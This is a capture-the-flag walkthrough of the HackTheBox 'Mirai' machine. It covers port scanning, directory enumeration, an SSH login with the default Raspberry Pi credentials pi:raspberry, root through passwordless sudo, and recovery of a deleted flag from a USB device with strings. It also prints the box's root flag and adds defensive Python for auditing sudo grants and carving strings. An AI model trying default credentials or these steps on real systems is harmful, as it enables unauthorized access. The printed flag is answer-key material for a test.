HackTheBox | Mirai
Initial TCP Nmap Scan
Nmap scan report for mirai.htb (10.10.10.48)
Host is up (0.72s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Website Blocked
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.18 seconds
Initial Thoughts Based On Nmap Scan
Looking at the ports we have 22 SSH, 53 DNS, and 80 HTTP. Looking at SSH, this is a port that I typically look back on but do not jump straight into. The reason for this is usually we need valid credentials or at the least a username so we could attempt to brute-force a user. Next, DNS is a good port to look into to gain more information about the host. We could perform zone transfers, which can reveal a lot of information about a domain. For port 80 HTTP, doing manual enumeration and spidering the website by hand with Burp Suite on while automated scans such as gobuster, nikto, etc. are running, to ensure we are using our time wisely, would be an important first step. Testing any parameters and anywhere user input can be thrown into is also another good thing to attempt, using characters that may break a web application such as a single quote, double quote, pipe, etc. Also attempting to find any version numbers, checking for default credentials, etc. is something I will be looking out for. I'm going to quickly look at DNS and HTTP and see what is of the most importance and triage from there.
53 - DNS | Enumeration
When looking into DNS, especially if DNS is on TCP, this usually indicates that it is trying to facilitate some sort of DNS zone transfer. So we can try this command:
dig axfr @10.10.10.48 pi.hole
We don’t get anything with zone transfers so I assume there isn’t much with DNS most likely.
80 - HTTP | Enumeration
Navigating to 10.10.10.48 I am presented with just a blank page. Trying to view the page source shows nothing. I decided to go and run a gobuster scan to potentially find other directories.
gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.html,.php
When running my scan the first thing that popped up was an admin directory. Navigating to 10.10.10.48/admin brought me to a page where it seems to be running Pi-Hole. In simple terms, Pi-Hole helps with network-wide ad blocking by having its DNS be a sinkhole that will stop unwanted content such as ads.
Before I start looking into Pi-Hole and manually navigating around, I started another gobuster scan, but I have it searching through the /admin directory now.
gobuster dir -u http://10.10.10.48/admin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.html,.php
The first place I decided to look into was the Login page. I started trying basic passwords like password, password123, etc. No luck with those. I also looked into what the default credentials for Pi-Hole were, which is pi:raspberry. No luck there either. I waited for my gobuster scans to finish, but none of these directories or files were of any use. I take a step back for a bit and remember that I could try using these credentials somewhere else, this being SSH.
Access to the Host via SSH and Default Credentials
┌──(root@kali)-[~]
└─# ssh pi@10.10.10.48
pi@10.10.10.48's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $
And we successfully logged in. As always, before I run any enumeration tools I like to just do a quick sudo -l to see if I am able to execute certain things with sudo permissions.
Privilege Escalation
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
And it tells me that I can just run whatever I want with sudo with no password. I'm just going to type sudo su and get root.
pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# id && whoami
uid=0(root) gid=0(root) groups=0(root)
root
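A defender-side check for the sudo -l output above, added here as an example and not part of the original writeup: it parses the text that sudo -l prints (a constructed copy of the two grants on the box, plus one narrower grant assumed for contrast) and rates each grant, so a passwordless (ALL) NOPASSWD: ALL entry is surfaced by the same audit an attacker would otherwise do by hand.

```python
import re

# Constructed sample of `sudo -l` output: the two grants the box printed, plus one
# narrower grant (assumed, not from the page) so a non-flagged case is visible.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
    (root) /usr/bin/apt-get update
"""

# One grant as sudo -l prints it: "(runas_user : runas_group) TAG: TAG: command"
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

def parse_sudo_l(text):
    """Return the grants listed after the 'User ... may run' line; Defaults are skipped."""
    grants = []
    in_grants = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_grants = True
            continue
        if not in_grants:
            continue
        m = ENTRY.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            runas_user = m.group("runas").split(":")[0].strip()
            grants.append({"runas": runas_user, "tags": tags, "cmd": m.group("cmd")})
    return grants

def rate_grant(grant):
    """critical: any command as root with no password (a plain `sudo su` suffices);
    high: same but a password is still asked; review: a specific binary, check it separately."""
    as_root = grant["runas"] in ("ALL", "root")
    any_cmd = grant["cmd"] == "ALL"
    if as_root and any_cmd and "NOPASSWD" in grant["tags"]:
        return "critical"
    if as_root and any_cmd:
        return "high"
    return "review"

def audit(text):
    """Return [(rating, runas_user, command), ...] for every grant in the output."""
    return [(rate_grant(g), g["runas"], g["cmd"]) for g in parse_sudo_l(text)]
```

On a live host the same functions can be fed the output of subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout.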
Usually I would just stop here since I got root, but the root.txt isn't actually just lying in plain sight.
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Finding the root.txt flag
Within the root.txt file we see something about how apparently this user lost the original root.txt file and it is on their USB stick. Since it is talking about a USB stick, I'm going to just use the mount command to see what devices are mounted on the host.
root@raspberrypi:/home/pi# mount
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755)
/dev/sda1 on /lib/live/mount/persistence/sda1 type iso9660 (ro,noatime)
/dev/loop0 on /lib/live/mount/rootfs/filesystem.squashfs type squashfs (ro,noatime)
tmpfs on /lib/live/mount/overlay type tmpfs (rw,relatime)
/dev/sda2 on /lib/live/mount/persistence/sda2 type ext4 (rw,noatime,data=ordered)
aufs on / type aufs (rw,noatime,si=3585a36e,noxino)
devtmpfs on /dev type devtmpfs (rw,nosuid,size=10240k,nr_inodes=58955,mode=755)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime)
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
tmpfs on /run/user/999 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=999,gid=997)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=1000,gid=1000)
Under /dev/sdb we can see there was a usbstick mentioned. We can just use strings against /dev/sdb, which will literally read the bits off of the device.
root@raspberrypi:/home/pi# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
And we see 3d3e483143ff12ec505d026fa13e020b which is the root flag!
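The recovery above works because deleting a file on ext4 frees its inode and data blocks but does not overwrite them, so the bytes are still readable from the raw device. The following Python is an added example and not part of the writeup: a minimal strings(1) equivalent run over a constructed byte blob that stands in for /dev/sdb, plus a filter for 32-hex-character tokens (the HTB flag format), so the flag can be pulled out of the noise automatically.

```python
import re
import string

# Constructed stand-in for the raw bytes of a small ext4 volume (not a real image).
# Real devices interleave binary metadata with directory entries and data blocks;
# the point is that deleting a file frees its blocks but leaves their bytes in place.
SAMPLE_IMAGE = (
    b"\x00" * 16
    + b"/media/usbstick\x00"                                 # mount path text
    + b"\x02\x00\x00\x00\x0c\x00\x01\x02.\x00\x00\x00"       # directory-entry-like bytes
    + b"lost+found\x00\x00root.txt\x00\x00damnit.txt\x00"    # names survive deletion
    + b"\xff" * 40                                           # unallocated binary noise
    + b">r &\x00"                                            # short junk run, as strings(1) shows
    + b"3d3e483143ff12ec505d026fa13e020b\n"                  # content of the deleted root.txt
    + b"\x00" * 8
    + b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    + b"-James\n"
    + b"\x00" * 32
)

# Printable ASCII as strings(1) sees it; newlines and other control bytes end a run.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")

def carve_strings(data, min_len=4):
    """Return every run of at least min_len printable bytes, like `strings -n`."""
    found = []
    run = bytearray()
    for byte in data:
        if byte in PRINTABLE:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:          # flush a run that ends at the end of the device
        found.append(run.decode("ascii"))
    return found

HEX32 = re.compile(r"^[0-9a-f]{32}$")  # md5-shaped token: the HTB flag format

def find_flag_candidates(data, min_len=4):
    """Carve strings and keep only 32-hex-char tokens, e.g. the root flag above."""
    return [s for s in carve_strings(data, min_len) if HEX32.match(s)]
```

On a live box the same functions take the device bytes directly, e.g. find_flag_candidates(open("/dev/sdb", "rb").read()).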
Overall this box was pretty straightforward. Boxes that force me to think back and use credentials everywhere are a great thing to get used to as this may definitely be a way in when doing the OSCP exam. I also enjoyed that it wasn't as simple as running sudo su and grabbing the root.txt flag.